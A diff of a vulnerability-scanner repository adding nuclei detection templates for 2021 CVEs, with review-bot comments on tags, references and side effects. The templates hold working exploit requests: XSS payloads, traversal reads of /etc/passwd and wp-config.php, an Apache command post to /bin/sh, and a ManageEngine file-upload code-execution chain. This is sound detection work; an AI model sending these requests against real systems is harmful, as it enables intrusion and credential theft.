+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '>PHP Version <\/td>([0-9.]+)'
+
+# Enhanced by mp on 2022/03/30
diff --git a/nuclei-templates/CVE-2021/cve-2021-37833.yaml b/nuclei-templates/CVE-2021/cve-2021-37833.yaml
new file mode 100644
index 0000000000..f76398eeb8
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-37833.yaml
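Review bot: The first `reference` entry in CVE-2021-37704 holds two URLs on one line (the phpfastcache pull request and the cve.mitre.org page), so anything that reads references as single links gets an invalid URL. Split it into two list items, `- https://github.com/PHPSocialNetwork/phpfastcache/pull/813` and `- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704`. `author: whoever` looks like a placeholder and should name the actual author. The description could also say in one sentence what a hit exposes (the full phpinfo() output of the host), since that is what decides how the finding is triaged.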
@@ -0,0 +1,43 @@ +id: CVE-2021-37833 + +info: + name: Hotel Druid 3.0.2 XSS + author: pikpikcu + severity: medium + description: Reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. + reference: + - https://github.com/dievus/CVE-2021-37833 + - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 + - https://www.hoteldruid.com + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-37833 + cwe-id: CWE-79 + tags: cve,cve2021,hoteldruid,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1' + - '{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1' + - '{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1' + - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' + + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-38702.yaml b/nuclei-templates/CVE-2021/cve-2021-38702.yaml new file mode 100644 index 0000000000..4c1fde131c --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-38702.yaml 
@@ -0,0 +1,39 @@
+id: CVE-2021-38702
+
+info:
+ name: Cyberoam NetGenie Cross-Site Scripting
+ author: geeknik
+ severity: medium
+ description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php.
+ reference:
+ - https://seclists.org/fulldisclosure/2021/Aug/20
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-38702
+ - http://www.cyberoamworks.com/NetGenie-Home.asp
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-38702
+ cwe-id: CWE-79
+ tags: cve,cve2021,cyberoam,netgenie,xss,router
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by cs on 2022/04/01
diff --git a/nuclei-templates/CVE-2021/cve-2021-39312.yaml b/nuclei-templates/CVE-2021/cve-2021-39312.yaml
new file mode 100644
index 0000000000..15ebd64523
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-39312.yaml
@@ -0,0 +1,44 @@ +id: CVE-2021-39312 + +info: + name: WordPress True Ranker <2.2.4 - Local File Inclusion + author: DhiyaneshDK + severity: high + description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion. + reference: + - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312 + - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php + - https://nvd.nist.gov/vuln/detail/CVE-2021-39312 + remediation: Fixed in version 2.2.4 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-39312 + cwe-id: CWE-22,CWE-22 + tags: unauth,lfr,wpscan,cve,cve2021,wp-plugin,lfi,wp,wordpress + +requests: + - raw: + - | + POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39316.yaml b/nuclei-templates/CVE-2021/cve-2021-39316.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-39316.yaml rename to nuclei-templates/CVE-2021/cve-2021-39316.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-39327.yaml b/nuclei-templates/CVE-2021/cve-2021-39327.yaml new file mode 100644 index 0000000000..f78e4f755b --- /dev/null 
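Review bot: `cwe-id: CWE-22,CWE-22` in CVE-2021-39312 lists the same weakness twice and should be `cwe-id: CWE-22`. The tags say `unauth` while the request carries a `wordpress_test_cookie` header; if the cookie is not needed it can go, otherwise the tag is misleading. A match means the response contained `DB_NAME` and `DB_PASSWORD` from wp-config.php, so the `remediation` line should tell the operator to treat a hit as credential exposure (rotate the database password and the WordPress keys after upgrading to 2.2.4) and to keep stored responses out of shared reports.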
+++ b/nuclei-templates/CVE-2021/cve-2021-39327.yaml @@ -0,0 +1,43 @@ +id: CVE-2021-39327 + +info: + name: WordPress BulletProof Security 5.1 Information Disclosure + author: geeknik + severity: medium + description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1. + reference: + - https://packetstormsecurity.com/files/164420/wpbulletproofsecurity51-disclose.txt + - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39327 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-39327 + cwe-id: CWE-200 + tags: cve,cve2021,wordpress,exposures + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt' + - '{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'BPS DB BACKUP LOG' + - '==================' + condition: and + + - type: status + status: + - 200 + + - type: word + part: header + words: + - 'text/plain' + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39433.yaml b/nuclei-templates/CVE-2021/cve-2021-39433.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-39433.yaml rename to nuclei-templates/CVE-2021/cve-2021-39433.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-40149.yaml b/nuclei-templates/CVE-2021/cve-2021-40149.yaml deleted file mode 100644 index 9d9700aaaf..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-40149.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: CVE-2021-40149 - -info: - name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure - author: For3stCo1d - severity: medium - description: | - Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability. - reference: - - https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt - - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.9 - cve-id: CVE-2021-40149 - cwe-id: CWE-552 - metadata: - shodan-query: http.title:"Reolink" - verified: "true" - tags: cve,cve2021,reolink,camera,iot,exposure,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/self.key" - - matchers-condition: and - matchers: - - type: word - words: - - "-----BEGIN RSA PRIVATE KEY-----" - - "-----END RSA PRIVATE KEY----" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/cve-2021-40150.yaml b/nuclei-templates/CVE-2021/cve-2021-40150.yaml new file mode 100644 index 0000000000..ec5bf726ea --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-40150.yaml 
@@ -0,0 +1,40 @@
+id: CVE-2021-40150
+
+info:
+ name: Reolink E1 Zoom Camera - Information Disclosure
+ author: For3stCo1d
+ severity: high
+ description: |
+ The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path.
+ An unauthenticated attacker can abuse this with network-level access to the camera to download the entire NGINX/FastCGI configurations.
+ reference:
+ - https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt
+ - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40150
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-40150
+ cwe-id: CWE-552
+ metadata:
+ shodan-query: http.title:"Reolink"
+ verified: "true"
+ tags: cve,cve2021,reolink,camera,exposure,iot
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/conf/nginx.conf"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "server"
+ - "listen"
+ - "fastcgi"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2021/cve-2021-40539.yaml b/nuclei-templates/CVE-2021/cve-2021-40539.yaml
new file mode 100644
index 0000000000..685aa50014
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-40539.yaml
@@ -0,0 +1,116 @@ +id: CVE-2021-40539 + +info: + name: Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution + author: daffainfo,pdteam + severity: critical + description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution. + reference: + - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis + - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html + - https://github.com/synacktiv/CVE-2021-40539 + - https://nvd.nist.gov/vuln/detail/CVE-2021-40539 + remediation: Upgrade to ADSelfService Plus build 6114. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-40539 + cwe-id: CWE-287 + tags: cve,cve2021,rce,ad,intrusive,manageengine + +requests: + + - raw: + - | + POST /./RestAPI/LogonCustomization HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458 + + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="methodToCall" + + unspecified + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="Save" + + yes + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="form" + + smartcard + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="operation" + + Add + --8b1ab266c41afb773af2e064bc526458 + Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="ws.jsp" + + <%@ page import="java.util.*,java.io.*"%> + <%@ page import="java.security.MessageDigest"%> + <% + String cve = "CVE-2021-40539"; + MessageDigest alg = MessageDigest.getInstance("MD5"); + alg.reset(); + alg.update(cve.getBytes()); + byte[] digest = alg.digest(); + StringBuffer hashedpasswd = new StringBuffer(); + String hx; + for (int i=0;i + --8b1ab266c41afb773af2e064bc526458-- + + - | + 
POST /./RestAPI/LogonCustomization HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b + + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="methodToCall" + + unspecified + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="Save" + + yes + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="form" + + smartcard + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="operation" + + Add + --43992a07d9a30213782780204a9f032b + Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="Si.class" + + {{hex_decode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}} + --43992a07d9a30213782780204a9f032b-- + + - | + POST /./RestAPI/Connection HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22 + + - | + GET /help/admin-guide/test.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + + - type: word + words: + - "114f7ce498a54a1be1de1f1e5731d0ea" # MD5 of CVE-2021-40539 + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/18 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40868.yaml b/nuclei-templates/CVE-2021/cve-2021-40868.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-40868.yaml rename to nuclei-templates/CVE-2021/cve-2021-40868.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-40875.yaml b/nuclei-templates/CVE-2021/cve-2021-40875.yaml new file mode 100644 index 0000000000..cc9e633024 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-40875.yaml 
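Review bot: CVE-2021-40539 is the one template in this batch that changes the target: the first two requests upload `ws.jsp` and `Si.class` through `/./RestAPI/LogonCustomization`, the third references the uploaded class, and no request removes the files afterwards. The `intrusive` tag is present, but `info` does not tell the operator what is left behind; I would add a comment above `requests:` such as `# State-changing: writes ws.jsp and Si.class on the target and presumably leaves /help/admin-guide/test.jsp; remove them after verification.` Listing the same file names in the description also lets the defending team recognise scan residue instead of investigating it as a compromise. The word and status matchers do not name a `part:`, which most sibling templates set explicitly with `part: body`.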
@@ -0,0 +1,41 @@
+id: CVE-2021-40875
+
+info:
+ name: Gurock TestRail Application files.md5 Exposure
+ author: oscarintherocks
+ severity: high
+ description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
+ reference:
+ - htttps://github.com/SakuraSamuraii/derailed
+ - https://johnjhacking.com/blog/cve-2021-40875/
+ - https://www.gurock.com/testrail/tour/enterprise-edition
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-40875
+ cwe-id: CWE-863
+ metadata:
+ shodan-query: https://www.shodan.io/search?query=TestRail
+ tags: cve,cve2021,exposure,gurock,testrail
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/files.md5"
+ - "{{BaseURL}}/testrail/files.md5"
+
+ max-size: 1000 # Define response size in bytes to read from server.
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "app/arguments/admin"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/06
diff --git a/nuclei-templates/CVE-2021/CVE-2021-40960.yaml b/nuclei-templates/CVE-2021/cve-2021-40960.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-40960.yaml
rename to nuclei-templates/CVE-2021/cve-2021-40960.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-40978.yaml b/nuclei-templates/CVE-2021/cve-2021-40978.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-40978.yaml
rename to nuclei-templates/CVE-2021/cve-2021-40978.yaml
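Review bot: The first reference in CVE-2021-40875 is spelled `htttps://github.com/SakuraSamuraii/derailed` and will not resolve; it should be `- https://github.com/SakuraSamuraii/derailed`. `shodan-query` holds a full search URL where the other templates in this patch hold a query expression (for example `http.title:"Reolink"`), so it presumably should carry only the query term from that URL. With `max-size: 1000` only the first kilobyte of `files.md5` is read, which means `app/arguments/admin` has to occur that early in the listing; a comment stating that assumption would help whoever debugs a missed detection.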
diff --git a/nuclei-templates/CVE-2021/cve-2021-41174.yaml b/nuclei-templates/CVE-2021/cve-2021-41174.yaml
new file mode 100644
index 0000000000..348eadf47e
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-41174.yaml
@@ -0,0 +1,51 @@ +id: CVE-2021-41174 + +info: + name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting + author: pdteam + severity: medium + description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. + reference: + - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8 + - https://nvd.nist.gov/vuln/detail/CVE-2021-41174 + - https://github.com/grafana/grafana/commit/3cb5214fa45eb5a571fd70d6c6edf0d729983f82 + - https://github.com/grafana/grafana/commit/31b78d51c693d828720a5b285107a50e6024c912 + remediation: Upgrade to 8.2.3 or higher. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-41174 + cwe-id: CWE-79 + metadata: + shodan-query: title:"Grafana" + tags: cve,cve2021,grafana,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1" + + skip-variables-check: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Grafana" + - "frontend_boot_js_done_time_seconds" + condition: and + + - type: regex + regex: + - '"subTitle":"Grafana (v8\.(?:(?:1|0)\.[0-9]|2\.[0-2]))' + + extractors: + - type: regex + group: 1 + regex: + - '"subTitle":"Grafana ([a-z0-9.]+)' + +# Enhanced by mp on 2022/03/06 diff --git a/nuclei-templates/CVE-2021/cve-2021-41467.yaml b/nuclei-templates/CVE-2021/cve-2021-41467.yaml new file mode 100644 index 0000000000..d82d191d05 
--- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-41467.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-41467 + +info: + name: JustWriting - Reflected Cross-Site Scripting + author: madrobot + severity: medium + description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. + reference: + - https://github.com/hjue/JustWriting/issues/106 + - https://nvd.nist.gov/vuln/detail/CVE-2021-41467 + - https://github.com/hjue/JustWriting/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-41467 + cwe-id: CWE-79 + tags: cve,cve2021,justwriting,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header + +# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/CVE-2021/cve-2021-41569.yaml b/nuclei-templates/CVE-2021/cve-2021-41569.yaml new file mode 100644 index 0000000000..e618bac41d --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-41569.yaml 
@@ -0,0 +1,35 @@
+id: CVE-2021-41569
+
+info:
+ name: SAS/Internet 9.4 1520 - Local File Inclusion
+ author: 0x_Akoko
+ severity: high
+ description: SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro.
+ reference:
+ - https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas
+ - https://support.sas.com/kb/68/641.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41569
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-41569
+ cwe-id: CWE-829
+ tags: cve,cve2021,sas,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/nuclei-templates/CVE-2021/CVE-2021-41649.yaml b/nuclei-templates/CVE-2021/cve-2021-41649.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-41649.yaml
rename to nuclei-templates/CVE-2021/cve-2021-41649.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-41878.yaml b/nuclei-templates/CVE-2021/cve-2021-41878.yaml
new file mode 100644
index 0000000000..5c1412624c
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-41878.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-41878
+
+info:
+ name: i-Panel Administration System - Reflected Cross-Site Scripting
+ author: madrobot
+ severity: medium
+ description: A reflected cross-site scripting vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41878
+ - https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-41878
+ cwe-id: CWE-79
+ tags: cve,cve2021,justwriting,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+# Enhanced by mp on 2022/02/27
diff --git a/nuclei-templates/CVE-2021/cve-2021-42013.yaml b/nuclei-templates/CVE-2021/cve-2021-42013.yaml
new file mode 100644
index 0000000000..f3bc5db893
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-42013.yaml
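Review bot: `tags: cve,cve2021,justwriting,xss` in CVE-2021-41878 carries the product tag of the JustWriting template (CVE-2021-41467) although this template targets the i-Panel Administration System, so tag-based selection runs it under the wrong product and misses it under the right one. Replace `justwriting` with a tag for i-Panel, e.g. `tags: cve,cve2021,ipanel,xss`; the tag name is a suggestion, so use whatever the repository already uses for this product. The name and description already identify the product correctly, so the fix is confined to that one line.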
@@ -0,0 +1,51 @@
+id: CVE-2021-42013
+
+info:
+ name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
+ author: nvn1729,0xd0ff9
+ severity: critical
+ description: |
+ A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
+ reference:
+ - https://httpd.apache.org/security/vulnerabilities_24.html
+ - https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-42013
+ - https://twitter.com/itsecurityco/status/1446136957117943815
+ remediation: Upgrade to Apache HTTP Server 2.4.51 or later.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-42013
+ cwe-id: CWE-22
+ tags: cve,cve2021,lfi,apache,rce,misconfig,traversal
+
+requests:
+ - raw:
+ - |+
+ GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+
+ - |+
+ POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{BaseURL}}
+ Content-Type: application/x-www-form-urlencoded
+
+ echo Content-Type: text/plain; echo; echo 31024-1202-EVC | rev
+
+ unsafe: true
+ matchers-condition: or
+ matchers:
+
+ - type: regex
+ name: LFI
+ regex:
+ - "root:.*:0:0:"
+
+ - type: word
+ name: RCE
+ words:
+ - "CVE-2021-42013"
+
+# Enhanced by mp on 2022/04/22
diff --git a/nuclei-templates/CVE-2021/cve-2021-42551.yaml b/nuclei-templates/CVE-2021/cve-2021-42551.yaml
new file mode 100644
index 0000000000..020ace78d8
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-42551.yaml
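Review bot: The `tags` line omits `intrusive` although the second raw request posts a shell command to /bin/sh on the target, so a scan configured to exclude intrusive templates will still run it; other templates in this commit (CVE-2021-46424) carry that tag for active checks. I would change the line to `tags: cve,cve2021,lfi,apache,rce,misconfig,traversal,intrusive`. The `RCE` word matcher also sits under `matchers-condition: or` with no status constraint, so a response body that merely mentions the string CVE-2021-42013 (an error or advisory page, for instance) is enough to report remote code execution; tying that matcher to the second response and a 200 status would narrow it.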
@@ -0,0 +1,49 @@
+id: CVE-2021-42551
+
+info:
+ name: NetBiblio WebOPAC - Reflected Cross-Site Scripting
+ author: compr00t
+ severity: medium
+ description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-42551
+ - https://www.redguard.ch/advisories/netbiblio_webopac.txt
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-42551
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,netbiblio
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x'
+ - '{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F'
+
+ redirects: true
+ max-redirects: 3
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "SearchTerm: 'x'+alert(1)+'x',"
+ - "SearchTerm: 'x\\\\'+alert(1),//',"
+ condition: or
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
